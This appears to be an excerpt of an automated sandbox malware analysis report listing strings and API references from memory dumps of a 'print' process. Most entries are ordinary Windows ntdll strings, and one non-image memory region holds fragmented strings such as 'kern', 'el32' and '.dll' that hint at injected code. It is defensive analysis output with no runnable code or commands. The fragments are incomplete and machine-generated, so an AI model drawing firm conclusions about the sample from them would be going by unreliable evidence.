                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$H
                                  • API String ID: 0-1157430829
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496036532.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_bb0000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                  • API String ID: 0-1539916866
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  Strings
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02EA4725
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02EA4655
                                  • Execute=1, xrefs: 02EA4713
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02EA4742
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 02EA4787
                                  • ExecuteOptions, xrefs: 02EA46A0
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02EA46FC
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02EA02BD
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02EA02E7
                                  • RTL: Re-Waiting, xrefs: 02EA031E
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  Strings
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02EA7B7F
                                  • RTL: Resource at %p, xrefs: 02EA7B8E
                                  • RTL: Re-Waiting, xrefs: 02EA7BAC
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02EA728C
                                  Strings
                                  • RTL: Resource at %p, xrefs: 02EA72A3
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02EA7294
                                  • RTL: Re-Waiting, xrefs: 02EA72C1
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496036532.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_bb0000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$el32$h$kern
                                  • API String ID: 0-4264704552
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496036532.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_bb0000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$l$l$t
                                  • API String ID: 0-168566397
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496036532.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_bb0000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$l$l$t
                                  • API String ID: 0-168566397